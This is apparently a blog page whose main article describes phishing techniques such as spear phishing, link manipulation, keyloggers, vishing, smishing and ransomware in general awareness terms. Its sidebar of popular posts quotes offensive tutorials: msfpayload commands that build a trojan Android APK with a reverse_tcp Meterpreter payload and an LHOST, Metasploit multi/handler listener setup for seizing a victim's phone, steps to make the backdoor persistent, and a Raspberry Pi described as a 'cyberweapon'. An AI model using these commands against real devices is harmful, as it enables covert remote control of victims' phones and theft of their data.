Techniques Of Phishing

-















There are a number of different techniques used to obtain personal 
information from users. As technology becomes more advanced, the cybercriminals' techniques being used are also more advanced.
To prevent Internet phishing, users should have knowledge of how the bad guys do this and they should also be aware of anti-phishing techniques to protect themselves from becoming victims.

phishing-sharkicon.pngSpear Phishing

While traditional phishing uses a 'spray and pray' approach, meaning mass emails are sent to as many people as possible, spear phishing is a much more targeted attack in which the hacker knows which specific individual or organization they are after. They do research on the target in order to make the attack more personalized and increase the likelihood of the target falling into their trap.

phishing-sharkicon.pngEmail/Spam

Using the most common phishing technique, the same email is sent to millions of users with a request to fill in personal details. These details will be used by the phishers for their illegal activities. Most of the messages have an urgent note which requires the user to enter credentials to update account information, change details, or verify accounts. Sometimes, they may be asked to fill out a form to access a new service through a link which is provided in the email.

phishing-sharkicon.pngWeb Based Delivery

Web based delivery is one of the most sophisticated phishing techniques. Also known as “man-in-the-middle,” the hacker is located in between the original website and the phishing system. The phisher traces details during a transaction between the legitimate website and the user. As the user continues to pass information, it is gathered by the phishers, without the user knowing about it.

phishing-sharkicon.pngLink Manipulation

Link manipulation is the technique in which the phisher sends a link to a malicious website. When the user clicks on the deceptive link, it opens up the phisher’s website instead of the website mentioned in the link. Hovering the mouse over the link to view the actual address stops users from falling for link manipulation.

phishing-sharkicon.pngKeyloggers

Keyloggers refer to the malware used to identify inputs from the keyboard. The information is sent to the hackers who will decipher passwords and other types of information. To prevent key loggers from accessing personal information, secure websites provide options to use mouse clicks to make entries through the virtual keyboard.

phishing-sharkicon.pngTrojan

A Trojan horse is a type of malware designed to mislead the user with an action that looks legitimate, but actually allows unauthorized access to the user account to collect credentials through the local machine. The acquired information is then transmitted to cybercriminals.

phishing-sharkicon.pngMalvertising

Malvertising is malicious advertising that contains active scripts designed to download malware or force unwanted content onto your computer. Exploits in Adobe PDF and Flash are the most common methods used in malvertisements.

phishing-sharkicon.pngSession Hijacking

In session hijacking, the phisher exploits the web session control mechanism to steal information from the user. In a simple session hacking procedure known as session sniffing, the phisher can use a sniffer to intercept relevant information so that he or she can access the Web server illegally.

phishing-sharkicon.pngContent Injection

Content injection is the technique where the phisher changes a part of the content on the page of a reliable website. This is done to mislead the user to go to a page outside the legitimate website where the user is then asked to enter personal information.

phishing-sharkicon.pngPhishing through Search Engines

Some phishing scams involve search engines where the user is directed to products sites which may offer low cost products or services. When the user tries to buy the product by entering the credit card details, it’s collected by the phishing site. There are many fake bank websites offering credit cards or loans to users at a low rate but they are actually phishing sites.

phishing-sharkicon.pngVishing (Voice Phishing)

In phone phishing, the phisher makes phone calls to the user and asks the user to dial a number. The purpose is to get personal information of the bank account through the phone. Phone phishing is mostly done with a fake caller ID.

phishing-sharkicon.pngSmishing (SMS Phishing)

Phishing conducted via Short Message Service (SMS), a telephone-based text messaging service. A smishing text, for example, attempts to entice a victim into revealing personal information via a link that leads to a phishing website.

phishing-sharkicon.pngMalware

Phishing scams involving malware require it to be run on the user’s computer. The malware is usually attached to the email sent to the user by the phishers. Once you click on the link, the malware will start functioning. Sometimes, the malware may also be attached to downloadable files.

phishing-sharkicon.pngRansomware

Ransomware denies access to a device or files until a ransom has been paid. Ransomware for PC's is malware that gets installed on a user’s workstation using a social engineering attack where the user gets tricked in clicking on a link, opening an attachment, or clicking on malvertising.

Comments

Post a Comment

Popular posts from this blog

How To Create A Persistent BackDoor In Android Using Kali Linux

-
Image
How to make the Backdoor Persistent: In this tutorial I am going to show you how to make the back door we created in my guide here a persistent one. I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites. Step 1   Fire Up Kali and Hack an Android System: Use this guide to hack an android system on LAN. I'll be hacking on WAN Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk Now, lets set-up a Listener: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.4 exploit     After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...   Step 2   Create a Persistent Script: Here.. Copy these comma...
Read more

How To Hack Android With Kali Linux

-
Image
  Step 1   Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Note: Replace msfpayload with msfvenom...... Step 2   Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3   Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal ...
Read more

How To Setup A Raspberry Pi Hacking Machine

-
Image
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux The Raspberry Pi 3 Motherboard (made in UK) is a credit card-sized computer that can crack Wi-Fi, clone key cards, break into laptops, and even clone an existing Wi-Fi network to trick users into connecting to the Pi instead. It can jam Wi-Fi for blocks, track cell phones, listen in on police scanners, broadcast an FM radio signal. The key to this power is a massive community of developers and builders who contribute thousands of builds for the Kali Linux and Raspberry Pi platforms. For less than a tank of gas, a Raspberry Pi 3 buys you a low-cost, flexible cyberweapon. Of course, it's important to compartmentalize your hacking and avoid using systems that uniquely identify you, like customized hardware. Not everyone has access to a supercomputer or gaming tower, but fortunately one is not needed to have a solid Kali Linux platform. With over 10 million units sold, t...
Read more